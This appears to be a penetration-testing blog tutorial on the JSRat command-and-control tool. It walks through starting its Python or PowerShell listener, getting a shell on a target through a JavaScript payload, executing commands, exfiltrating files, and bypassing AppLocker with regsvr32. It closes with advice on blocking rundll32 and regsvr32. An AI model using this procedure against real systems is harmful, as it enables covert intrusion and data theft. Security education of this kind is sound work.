There are a number command and controls tools that can use a variety fof methods in order to hide malicious traffic or execute implants in various formats. Casey Smith originally developed a prototype tool which is using JavaScript as a payload and it connects back to a listening web server. A security researcher 3gstudent extended Casey Smith work and developed JSRat in PowerShell which provides some additionally functionality. Other variations of this tool exist in Python so the master host can be either a Linux machine or a Windows. Similarly another C2 tool that can generate JavaScript implants is called PoshC2 from Nettitude.

JSRat is a command and control tool which is using JavaScript payloads and the HTTP protocol for communication between the server and the target hosts. There are two implementations one in Python and one in PowerShell which their usage is described below.

Python

The python implementation of JSRat will start a web server and it will wait for the client command to be executed:

python MyJSRat.py -i 192.168.1.203 -p 8080
JSRat - Server

JSRat – Server

Once the user visit the Client Command URL a connection will be established with the host. The JSRat can be used to executed commands, run executables and scripts or just for data exfiltration.

JSRat - Usage Options

JSRat – Usage Options

In order to establish a proper shell a JavaScript payload needs to be executed. This payload is stored on the URL below:

JSRat - Generated Command

JSRat – Generated Command

The command that it has been generated needs to be executed from command prompt.

JSRat - Implant Execution

JSRat – Implant Execution

Once the command is executed a shell will be received.

JSRat - Console

JSRat – Console

Commands can be executed from the shell as normal.

JSRat - Command Execution

JSRat – Command Execution

JSRat can also read, download or upload files.

JSRat - Data Exfiltration

JSRat – Data Exfiltration

Execution of executables and scripts can be also performed by following a sequence like:

  1. run
  2. calc.exe
JSRat - Run Executables

JSRat – Run Executables

There is also another python implementation of this tool which provides and a method (regsvr32) of AppLocker bypass.

JSRat - AppLocker Bypass

JSRat – AppLocker Bypass Method

The JSRat will generate and host a scriptlet file which will contain the payload.

PowerShell

Alternatively there is also a PowerShell implementation of this JSRat which can perform the same operations from a PowerShell console. The script needs to be modified with the IP address of the listener prior to any execution.

JSRat PowerShell - Server Listening

JSRat PowerShell – Server Listening

The payload command that needs to be executed on the target is also included in the comments of the script.

JSRat PowerShell - Payload Command

JSRat PowerShell – Payload Command

Running the payload command will connect the target host and a console will be obtained.

JSRat PowerShell - Usage

JSRat PowerShell – Usage

Commands can be executed on the target like any other normal command prompt.

JSRat PowerShell - Command Execution

JSRat PowerShell – Command Execution

Conclusion

The major advantage of this command and control tool is that it doesn’t need any implant to be written into disk. It is very fast and all the communication is done via HTTP which is a common protocol. Since JSRat is using JavaScript payloads detection is hard unless rundll32 is monitored. Enabling and configuring AppLocker to deny execution of rundll32 and regsvr32 will prevent the attack.

Resources

Advertisements